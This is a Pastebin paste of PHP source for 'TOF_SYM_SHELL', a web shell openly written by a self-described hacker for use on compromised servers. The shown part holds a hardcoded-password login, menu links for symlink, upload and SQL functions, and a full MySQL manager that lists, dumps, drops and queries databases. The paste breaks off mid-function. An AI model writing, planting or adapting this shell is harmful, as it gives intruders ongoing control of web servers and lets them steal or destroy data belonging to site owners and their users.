Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- * Coded by AJITH KP aka 0x4j17# aka c0bra
- * Its free from backdooring function
- * I provide it as OpenSource
- * Jai Hind...
- * Greets to TOF members and all other Indian Hackers...
- * Note ---> SQL Manager was not done by me... I decoded a encrypted SQLManager Shell for add this feature...
- * So The credits of SQLManager goes to them
- *
- */
- $user = 'ajithkp560'; // Username
- $pass = 'ajithkp560'; // Password
- if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
- {
- if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
- {
- print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
- }
- else
- {
- if($_POST['usrname'])
- {
- print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
- }
- echo '<title>r00t@TOF:~# LOGIN...</title>
- <body bgcolor="black"><br><br>
- <center><font color=#990000 size=5><b>::LOGIN::</b></center>
- <div align="center">
- <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
- <input dir="ltr" name="usrname" value="User Name" type="text" size="30" onfocus="if (this.value == \'User Name\'){this.value = \'\';}"/><br>
- <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'password\') this.value = \'\';" /><br>
- <input type="submit" value=" Login " name="login" />
- </form></p>';
- exit;
- }
- }
- echo "<style>
- p.location { color: silver; }
- th, td { border:1px solid green; }
- hr { color:green; background-color:green; }
- textarea { width:900px; height: 350px; border: 2px solid green; background-color:black; color: green; font-size:103%; }
- input { background-color:black; color:green; border: 1px solid green; }
- html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
- tr { background-color: black; color: green; border:1px groove green; cellpadding:5px; }
- body, a, p { font-family:tahoma; backgound-color:black; border: 1ps solid green; color: green; font-size:15; }
- .title { background-color: black; color: green; width:960px; height:auto; border:1px groove green; -moz-border-radius: 20px; border-radius: 20px; }
- .greets { background-color: black; color: green; width: 960px; height: auto; font-family: helvetica; border:1px solid green; -moz-border-radius: 20px; border-radius: 20px; }
- .container { background-color: black; color: green; border:1px solid green; -moz-border-radius: 10px; border-radius: 10px; width:960px; font-size=15px; }
- .containerx { background-color: black; color: green; width:auto; height:auto; font-size=15px; border:1px solid green; }
- a { color: red; text-decoration:none; font-size=15px; }
- a:hover { color:green; text-decoration: blink; }
- </style>";
- echo "<title>r00t@TOF:~#</title><body><center>
- <div class=title><p><h><font size=6>_TOF_SYM_SHELL_</font></h><br />".php_uname()."<br />
- [ <a href=http://www.terminalcoders.blogspot.in>home</a> ] [ <a href=http://www.openfire-security.net>Forum</a> ]</p></div>
- <br />";
- echo "</div><br />
- <div class=greets><p>[ <a href=?>HOME</a> ] [ <a href=?sym=akp>SYMLINK</a> ] [ <a href=?sql>SQL Manager</a> ] [ <a href=?upload=akp>UPLOAD</a> ] [ <a href=?about=akp>About us</a> ]</p></div><br />";
- if(isset($_REQUEST['sql']))
- {
- echo '<div class=containerx>';
- if ( function_exists('ini_get') ) {
- $onoff = ini_get('register_globals');
- } else {
- $onoff = get_cfg_var('register_globals');
- }
- if ($onoff != 1) {
- @extract($HTTP_SERVER_VARS, EXTR_SKIP);
- @extract($HTTP_COOKIE_VARS, EXTR_SKIP);
- @extract($HTTP_POST_FILES, EXTR_SKIP);
- @extract($HTTP_POST_VARS, EXTR_SKIP);
- @extract($HTTP_GET_VARS, EXTR_SKIP);
- @extract($HTTP_ENV_VARS, EXTR_SKIP);
- }
- function logon() {
- global $PHP_SELF;
- setcookie( "mysql_web_admin_username" );
- setcookie( "mysql_web_admin_password" );
- setcookie( "mysql_web_admin_hostname" );
- echo "<title>r00t@TOF:~# Database</title>\n";
- echo "<table width=100% height=100%><tr><td><center>\n";
- echo "<table cellpadding=2><tr><td><center>\n";
- echo "<table cellpadding=20><tr><td><center>\n";
- echo "<form sql='$PHP_SELF'>\n";
- echo "<input type=hidden name=sql value=logon_submit>\n";
- echo "<table cellpadding=5 cellspacing=1>\n";
- echo "<tr><td></td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
- echo "<tr><td></td><td> <input type=text name=username value='username'></td></tr>\n";
- echo "<tr><td></td><td> <input type=password name=password value='password'></td></tr>\n";
- echo "</table><p>\n";
- echo "<input type=submit value='Login'><br>\n";
- echo "</form>\n";
- echo "</center></td></tr></table>\n";
- echo "</center></td></tr></table>\n";
- echo "<p><hr width=300>\n";
- echo "<h2>r00t@TOF~# SQL Manager</h2>\n";
- echo "</body>\n";
- echo "</html>\n";
- }
- function logon_submit() {
- global $username, $password, $hostname ,$PHP_SELF;
- if($hostname =='')
- $hostname = 'localhost';
- setcookie( "mysql_web_admin_username", $username );
- setcookie( "mysql_web_admin_password", $password );
- setcookie( "mysql_web_admin_hostname", $hostname );
- print'<script>document.cookie="mysql_web_admin_hostname='.$hostname.';";document.cookie="mysql_web_admin_username='.$username.';";document.cookie="mysql_web_admin_password='.$password.';";</script>';
- echo "<html>";
- echo "<head>";
- echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?sql=listDBs'>";
- echo "</head>";
- echo "</html>";
- }
- function echoQueryResult() {
- global $queryStr, $errMsg;
- if( $errMsg == "" ) $errMsg = "Success";
- if( $queryStr != "" ) {
- echo "<table cellpadding=5>\n";
- echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
- echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
- echo "</table><p>\n";
- }
- }
- function listDatabases() {
- global $mysqlHandle, $PHP_SELF;
- echo "<h2>Databases List</h2>\n";
- echo "<form sql='$PHP_SELF'>\n";
- echo "<input type=hidden name=sql value=createDB>\n";
- echo "<input type=text name=dbname>\n";
- echo "<input type=submit value='Create Database'>\n";
- echo "</form>\n";
- echo "<hr>\n";
- echo "<table cellspacing=1 cellpadding=5>\n";
- $pDB = mysql_list_dbs( $mysqlHandle );
- $num = mysql_num_rows( $pDB );
- for( $i = 0; $i < $num; $i++ ) {
- $dbname = mysql_dbname( $pDB, $i );
- echo "<tr>\n";
- echo "<td>$dbname</td>\n";
- echo "<td><a href='$PHP_SELF?sql=listTables&dbname=$dbname'>Tables</a></td>\n";
- echo "<td><a href='$PHP_SELF?sql=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
- echo "<td><a href='$PHP_SELF?sql=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
- echo "</tr>\n";
- }
- echo "</table>\n";
- }
- function createDatabase() {
- global $mysqlHandle, $dbname, $PHP_SELF;
- mysql_create_db( $dbname, $mysqlHandle );
- listDatabases();
- }
- function dropDatabase() {
- global $mysqlHandle, $dbname, $PHP_SELF;
- mysql_drop_db( $dbname, $mysqlHandle );
- listDatabases();
- }
- function listTables() {
- global $mysqlHandle, $dbname, $PHP_SELF;
- echo "<h2>Tables List</h2>\n";
- echo "<p class=location>$dbname</p>\n";
- echoQueryResult();
- echo "<form sql='$PHP_SELF'>\n";
- echo "<input type=hidden name=sql value=createTable>\n";
- echo "<input type=hidden name=dbname value=$dbname>\n";
- echo "<input type=text name=tablename>\n";
- echo "<input type=submit value='Create Table'>\n";
- echo "</form>\n";
- echo "<form sql='$PHP_SELF'>\n";
- echo "<input type=hidden name=sql value=query>\n";
- echo "<input type=hidden name=dbname value=$dbname>\n";
- echo "<input type=text size=120 name=queryStr>\n";
- echo "<input type=submit value='Query'>\n";
- echo "</form>\n";
- echo "<hr>\n";
- $pTable = mysql_list_tables( $dbname );
- if( $pTable == 0 ) {
- $msg = mysql_error();
- echo "<h3>Error : $msg</h3><p>\n";
- return;
- }
- $num = mysql_num_rows( $pTable );
- echo "<table cellspacing=1 cellpadding=5>\n";
- for( $i = 0; $i < $num; $i++ ) {
- $tablename = mysql_tablename( $pTable, $i );
- echo "<tr>\n";
- echo "<td>\n";
- echo "$tablename\n";
- echo "</td>\n";
- echo "<td>\n";
- echo "<a href='$PHP_SELF?sql=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
- echo "</td>\n";
- echo "<td>\n";
- echo "<a href='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
- echo "</td>\n";
- echo "<td>\n";
- echo "<a href='$PHP_SELF?sql=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
- echo "</td>\n";
- echo "<td>\n";
- echo "<a href='$PHP_SELF?sql=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
- echo "</td>\n";
- echo "</tr>\n";
- }
- echo "</table>";
- }
- function createTable() {
- global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
- $queryStr = "CREATE TABLE $tablename ( no INT )";
- mysql_select_db( $dbname, $mysqlHandle );
- mysql_query( $queryStr, $mysqlHandle );
- $errMsg = mysql_error();
- listTables();
- }
- function dropTable() {
- global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
- $queryStr = "DROP TABLE $tablename";
- mysql_select_db( $dbname, $mysqlHandle );
- mysql_query( $queryStr, $mysqlHandle );
- $errMsg = mysql_error();
- listTables();
- }
- function viewSchema() {
- global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
- echo "<h2>Table Schema</h2>\n";
- echo "<p class=location>$dbname > $tablename</p>\n";
- echoQueryResult();
- echo "<a href='$PHP_SELF?sql=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
- echo "<a href='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
- echo "<hr>\n";
- $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
- $num = mysql_num_rows( $pResult );
- echo "<table cellspacing=1 cellpadding=5>\n";
- echo "<tr>\n";
- echo "<th>Field</th>\n";
- echo "<th>Type</th>\n";
- echo "<th>Null</th>\n";
- echo "<th>Key</th>\n";
- echo "<th>Default</th>\n";
- echo "<th>Extra</th>\n";
- echo "<th colspan=2>sql</th>\n";
- echo "</tr>\n";
- for( $i = 0; $i < $num; $i++ ) {
- $field = mysql_fetch_array( $pResult );
- echo "<tr>\n";
- echo "<td>".$field["Field"]."</td>\n";
- echo "<td>".$field["Type"]."</td>\n";
- echo "<td>".$field["Null"]."</td>\n";
- echo "<td>".$field["Key"]."</td>\n";
- echo "<td>".$field["Default"]."</td>\n";
- echo "<td>".$field["Extra"]."</td>\n";
- $fieldname = $field["Field"];
- echo "<td><a href='$PHP_SELF?sql=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
- echo "<td><a href='$PHP_SELF?sql=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
- echo "</tr>\n";
- }
- echo "</table>\n";
- }
- function manageField( $cmd ) {
- global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
- if( $cmd == "add" )
- echo "<h2>Tambah Field</h2>\n";
- else if( $cmd == "edit" ) {
- echo "<h2>Edit Field</h2>\n";
- $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
- $num = mysql_num_rows( $pResult );
- for( $i = 0; $i < $num; $i++ ) {
- $field = mysql_fetch_array( $pResult );
- if( $field["Field"] == $fieldname ) {
- $fieldtype = $field["Type"];
- $fieldkey = $field["Key"];
- $fieldextra = $field["Extra"];
- $fieldnull = $field["Null"];
- $fielddefault = $field["Default"];
- break;
- }
- }
- $type = strtok( $fieldtype, " (,)\n" );
- if( strpos( $fieldtype, "(" ) ) {
- if( $type == "enum" | $type == "set" ) {
- $valuelist = strtok( " ()\n" );
- } else {
- $M = strtok( " (,)\n" );
- if( strpos( $fieldtype, "," ) )
- $D = strtok( " (,)\n" );
- }
- }
- }
- echo "<p class=location>$dbname > $tablename</p>\n";
- echo "<form sql=$PHP_SELF>\n";
- if( $cmd == "add" )
- echo "<input type=hidden name=sql value=addField_submit>\n";
- else if( $cmd == "edit" ) {
- echo "<input type=hidden name=sql value=editField_submit>\n";
- echo "<input type=hidden name=old_name value=$fieldname>\n";
- }
- echo "<input type=hidden name=dbname value=$dbname>\n";
- echo "<input type=hidden name=tablename value=$tablename>\n";
- echo "<h3>Name</h3>\n";
- echo "<input type=text name=name value=$fieldname><p>\n";
- echo '
- <h3>Type</h3>
- <font size=2>
- * `M\' indicates the maximum display size.<br>
- * `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
- </font>
- <table>
- <tr>
- <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th>binary</th>
- </tr>
- <tr>
- <td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
- <td align=center>O</td>
- <td align=center>O</td>
- <td> </td>
- <td align=center>O</td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
- <td align=center>O</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
- <td align=center>O</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td align=center>O</td>
- </tr>
- <tr>
- <td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
- <td align=center>O</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td align=center>O</td>
- </tr>
- <tr>
- <td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- <td> </td>
- </tr>
- <tr>
- <td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
- <td colspan=5><center>value list</center></td>
- </tr>
- <tr>
- <td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
- <td colspan=5><center>value list</center></td>
- </tr>
- </table>
- <table>
- <tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
- <tr>
- <td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
- <td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
- <td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
- <td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
- <td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" ) ) echo "checked";echo '></td>
- <td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
- </tr>
- </table>
- <h3>Flags</h3>
- <table>
- <tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
- <tr>
- <td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
- <td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
- <td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
- <td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
- </tr>
- </table>
- <p>';
- if( $cmd == "add" )
- echo "<input type=submit value='Add Field'>\n";
- else if( $cmd == "edit" )
- echo "<input type=submit value='Edit Field'>\n";
- echo "<input type=button value=Cancel onClick='history.back()'>\n";
- echo "</form>\n";
- }
- function manageField_submit( $cmd ) {
- global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
- $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
- if( $cmd == "add" )
- $queryStr = "ALTER TABLE $tablename ADD $name ";
- else if( $cmd == "edit" )
- $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
- if( $M != "" )
- if( $D != "" )
- $queryStr .= "$type($M,$D) ";
- else
- $queryStr .= "$type($M) ";
- else if( $valuelist != "" ) {
- $valuelist = stripslashes( $valuelist );
- $queryStr .= "$type($valuelist) ";
- } else
- $queryStr .= "$type ";
- $queryStr .= "$unsigned $zerofill $binary ";
- if( $default_value != "" )
- $queryStr .= "DEFAULT '$default_value' ";
- $queryStr .= "$not_null $auto_increment";
- mysql_select_db( $dbname, $mysqlHandle );
- mysql_query( $queryStr, $mysqlHandle );
- $errMsg = mysql_error();
- // key change
- $keyChange = false;
- $result = mysql_query( "SHOW KEYS FROM $tablename" );
- $primary = "";
- while( $row = mysql_fetch_array($result) )
- if( $row["Key_name"] == "PRIMARY" ) {
- if( $row[Column_name] == $name )
- $keyChange = true;
- else
- $primary .= ", $row[Column_name]";
- }
- if( $primary_key == "PRIMARY KEY" ) {
- $primary .= ", $name";
- $keyChange = !$keyChange;
- }
- $primary = substr( $primary, 2 );
- if( $keyChange == true ) {
- $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
- mysql_query( $q );
- $queryStr .= "<br>\n" . $q;
- $errMsg .= "<br>\n" . mysql_error();
- $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
- mysql_query( $q );
- $queryStr .= "<br>\n" . $q;
- $errMsg .= "<br>\n" . mysql_error();
- }
- viewSchema();
- }
- function dropField() {
- global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
- $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
- mysql_select_db( $dbname, $mysqlHandle );
- mysql_query( $queryStr , $mysqlHandle );
- $errMsg = mysql_error();
- viewSchema();
- }
- function viewData( $queryStr ) {
- global $sql, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
- echo "<h2>Data in Table</h2>\n";
- if( $tablename != "" )
- echo "<p class=location>$dbname > $tablename</p>\n";
- else
- echo "<p class=location>$dbname</p>\n";
- $queryStr = stripslashes( $queryStr );
- if( $queryStr == "" ) {
- $queryStr = "SELECT * FROM $tablename";
- if( $orderby != "" )
- $queryStr .= " ORDER BY $orderby";
- echo "<a href='$PHP_SELF?sql=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
- echo "<a href='$PHP_SELF?sql=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
- }
- $pResult = mysql_db_query( $dbname, $queryStr );
- $fieldt = mysql_fetch_field($pResult);
- $tablename = $fieldt->table;
- $errMsg = mysql_error();
- $GLOBALS[queryStr] = $queryStr;
- if( $pResult == false ) {
- echoQueryResult();
- return;
- }
- if( $pResult == 1 ) {
- $errMsg = "Success";
- echoQueryResult();
- return;
- }
- echo "<hr>\n";
- $row = mysql_num_rows( $pResult );
- $col = mysql_num_fields( $pResult );
- if( $row == 0 ) {
- echo "Kosong !";
- return;
- }
- if( $rowperpage == "" ) $rowperpage = 30;
- if( $page == "" ) $page = 0;
- else $page--;
- mysql_data_seek( $pResult, $page * $rowperpage );
- echo "<table>\n";
- echo "<tr>\n";
- for( $i = 0; $i < $col; $i++ ) {
- $field = mysql_fetch_field( $pResult, $i );
- echo "<th>";
- if($sql == "viewData")
- echo "<a href='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
- else
- echo "<font style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
- echo "</th>\n";
- }
- echo "<th colspan=2>sql</th>\n";
- echo "</tr>\n";
- for( $i = 0; $i < $rowperpage; $i++ ) {
- $rowArray = mysql_fetch_row( $pResult );
- if( $rowArray == false ) break;
- echo "<tr>\n";
- $key = "";
- for( $j = 0; $j < $col; $j++ ) {
- $data = $rowArray[$j];
- $field = mysql_fetch_field( $pResult, $j );
- if( $field->primary_key == 1 )
- $key .= "&" . $field->name . "=" . $data;
- if( strlen( $data ) > 30 )
- $data = substr( $data, 0, 30 ) . "...";
- $data = htmlspecialchars( $data );
- echo "<td>\n";
- echo "$data\n";
- echo "</td>\n";
- }
- if( $key == "" )
- echo "<td colspan=2>no Key</td>\n";
- else {
- echo "<td><a href='$PHP_SELF?sql=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
- echo "<td><a href='$PHP_SELF?sql=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
- }
- echo "</tr>\n";
- }
- echo "</table>\n";
- echo "<font size=2>\n";
- if($sql == "viewData")
- echo "<form sql='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
- else
- echo "<form sql='$PHP_SELF?sql=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
- echo "<font color=green>\n";
- echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
- echo "</font>\n";
- echo " | ";
- if( $page > 0 ) {
- if($sql == "viewData")
- echo "<a href='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
- else
- echo "<a href='$PHP_SELF?sql=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
- if( $orderby != "" && $sql == "viewData")
- echo "&orderby=$orderby";
- echo "'>Prev</a>\n";
- } else
- echo "Prev";
- echo " | ";
- if( $page < ($row/$rowperpage)-1 ) {
- if($sql == "viewData")
- echo "<a href='$PHP_SELF?sql=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
- else
- echo "<a href='$PHP_SELF?sql=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
- if( $orderby != "" && $sql == "viewData")
- echo "&orderby=$orderby";
- echo "'>Next</a>\n";
- } else
- echo "Next";
- echo " | ";
- if( $row > $rowperpage ) {
- echo "<input type=text size=4 name=page>\n";
- echo "<input type=submit value='Go'>\n";
- }
- echo "</form>\n";
- echo "</font>\n";
- }
- function manageData( $cmd ) {
- global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
- if( $cmd == "add" )
- echo "<h2>Tambah Data</h2>\n";
- else if( $cmd == "edit" ) {
- echo "<h2>Edit Data</h2>\n";
- $pResult = mysql_list_fields( $dbname, $tablename );
- $num = mysql_num_fields( $pResult );
- $key = "";
- for( $i = 0; $i < $num; $i++ ) {
- $field = mysql_fetch_field( $pResult, $i );
- if( $field->primary_key == 1 )
- if( $field->numeric == 1 )
- $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
- else
- $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
- }
- $key = substr( $key, 0, strlen($key)-4 );
- mysql_select_db( $dbname, $mysqlHandle );
- $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
- $data = mysql_fetch_array( $pResult );
- }
- echo "<p class=location>$dbname > $tablename</p>\n";
- echo "<form sql='$PHP_SELF' method=post>\n";
- if( $cmd == "add" )
- echo "<input type=hidden name=sql value=addData_submit>\n";
- else if( $cmd == "edit" )
- echo "<input type=hidden name=sql value=editData_submit>\n";
- echo "<input type=hidden name=dbname value=$dbname>\n";
- echo "<input type=hidden name=tablename value=$tablename>\n";
- echo "<table>\n";
- echo "<tr>\n";
- echo "<th>Name</th>\n";
- echo "<th>Type</th>\n";
- echo "<th>Function</th>\n";
- echo "<th>Data</th>\n";
- echo "</tr>\n";
- $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
- $num = mysql_num_rows( $pResult );
- $pResultLen = mysql_list_fields( $dbname, $tablename );
- for( $i = 0; $i < $num; $i++ ) {
- $field = mysql_fetch_array( $pResult );
- $fieldname = $field["Field"];
- $fieldtype = $field["Type"];
- $len = mysql_field_len( $pResultLen, $i );
- echo "<tr>";
- echo "<td>$fieldname</td>";
- echo "<td>".$field["Type"]."</td>";
- echo "<td>\n";
- echo "<select name=${fieldname}_function>\n";
- echo "<option>\n";
- echo "<option>ASCII\n";
- echo "<option>CHAR\n";
- echo "<option>SOUNDEX\n";
- echo "<option>CURDATE\n";
- echo "<option>CURTIME\n";
- echo "<option>FROM_DAYS\n";
- echo "<option>FROM_UNIXTIME\n";
- echo "<option>NOW\n";
- echo "<option>PASSWORD\n";
- echo "<option>PERIOD_ADD\n";
- echo "<option>PERIOD_DIFF\n";
- echo "<option>TO_DAYS\n";
- echo "<option>USER\n";
- echo "<option>WEEKDAY\n";
- echo "<option>RAND\n";
- echo "</select>\n";
- echo "</td>\n";
- $value = htmlspecialchars($data[$i]);
- if( $cmd == "add" ) {
- $type = strtok( $fieldtype, " (,)\n" );
- if( $type == "enum" || $type == "set" ) {
- echo "<td>\n";
- if( $type == "enum" )
- echo "<select name=$fieldname>\n";
- else if( $type == "set" )
